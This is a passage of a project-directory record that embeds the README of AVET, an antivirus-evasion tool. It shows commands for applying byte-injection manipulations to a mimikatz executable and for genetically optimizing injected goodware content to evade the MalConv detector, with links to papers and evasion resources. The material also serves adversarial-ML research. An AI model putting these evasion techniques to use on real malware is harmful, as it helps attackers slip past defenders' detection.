create a virtual environment and install the needed dependencies from `requirements.txt`.\n\n### Practical Manipulations\nFive functionality-preserving manipulations for PE files are available:\n\n![Practical Manipulations](images/pm.png)\n\nTo apply the practical manipulation to the malware with random bytes injected, use the `gen_adversarial_exe` command followed by name of the practical manipulation and the path to the file as parameters.\nAvailable manipulations are `full_dos`, `extend`, `shift`, `padding`, `section_injection`.\n\nFor example:\n```sh\ngen_adversarial_exe section_injection output/rc4enc_mimikatz_adversarial_win64.exe\n```\n\n### Genetic Optimizing\nInstead of injecting random content, it is possible to optimize the content, to achieve higher probability of evasion.\nThe optimizer extracts benign sections from goodware and uses a genetic algorithm to optimize the injected content.\nThe content is optimized against MalConv, which is a static machine learning-based detector based on a convolutional neural network.\nThe used MalConv implementation is from the [SecML Malware](https://github.com/pralab/secml_malware) library.\n\nGoodware is required and should be put into the `input/goodware_samples` folder.\nThe [DikeDataset](https://github.com/iosifache/DikeDataset) for example is a good source to get benign executable files. The more, the better, but 100 is sufficient for testing purposes.\n\nTo use the optimizer, use the `$genetic_optimizer` command:\n```sh\n$genetic_optimizer -pm $practical_manipulation -p $population_size output/rc4enc_mimikatz_adversarial_win64.exe\n```\nPossible Options:\n```\n-p, --population_size, default=50\n-e, --elitsm, default=10\n-i, --iteration, default=10\n-pr, --penalty_regularizer, default=1e-6\n-ss, --section_size, default=10\n-pm, --practical_manipulation, default=section_injection\n```\n\nMore about adversarial examples, genetic optimizing and MalConv can be read here:\n- [Adversarial EXEmples: A Survey and Experimental Evaluation of Practical Attacks on Machine Learning for Windows Malware Detection](https://arxiv.org/abs/2008.07125)\n- [Functionality-preserving Black-box Optimization of Adversarial Windows Malware](https://arxiv.org/abs/2003.13526)\n- [Malware Detection by Eating a Whole EXE](https://arxiv.org/abs/1710.09435)\n\n\n## More\n---\n\nFor basics about antivirus evasion, AVET \u0026 more information have a look here (most for version 1.3): \n- [https://govolution.wordpress.com/2018/08/07/paper-avet-blackhat-usa-arsenal-2018/](https://govolution.wordpress.com/2018/08/07/paper-avet-blackhat-usa-arsenal-2018/)\n- [https://govolution.wordpress.com/2017/06/11/avet-video/](https://govolution.wordpress.com/2017/06/11/avet-video/)\n- [https://govolutionde.files.wordpress.com/2014/05/avevasion_pentestmag.pdf](https://govolutionde.files.wordpress.com/2014/05/avevasion_pentestmag.pdf)\n- [https://deepsec.net/docs/Slides/2014/Why_Antivirus_Fails_-_Daniel_Sauder.pdf](https://deepsec.net/docs/Slides/2014/Why_Antivirus_Fails_-_Daniel_Sauder.pdf)\n- [https://twitter.com/DanielX4v3r](https://twitter.com/DanielX4v3r)\n- [https://github.com/govolution/avetosx](https://github.com/govolution/avetosx)\n- [https://github.com/tacticaljmp](https://github.com/tacticaljmp)\n- [https://github.com/Mr-Un1k0d3r/DKMC](https://github.com/Mr-Un1k0d3r/DKMC)\n- [https://github.com/m0n0ph1/Basic-File-Crypter](https://github.com/m0n0ph1/Basic-File-Crypter)\n- [https://github.com/hasherezade/pe_to_shellcode](https://github.com/hasherezade/pe_to_shellcode)\n- [https://github.com/hasherezade/demos/](https://github.com/hasherezade/demos/)\n- [https://github.com/a0rtega/pafish](https://github.com/a0rtega/pafish)\n- [https://danielsauder.com](https://danielsauder.com)\n\n","funding_links":[],"categories":["Uncategorized","\u003ca id=\"5dd93fbc2f2ebc8d98672b2d95782af3\"\u003e\u003c/a\u003e工具","\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","Tools","Anti-virus Evasion Tools"],"sub_categories":["Uncategorized","\u003ca id=\"b1161d6c4cb520d0cd574347cd18342e\"\u003e\u003c/a\u003e免杀\u0026\u0026躲避AV检测","Anti-virus Evasion Tools","Tor Tools"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgovolution%2Favet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgovolution%2Favet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgovolution%2Favet/lists"}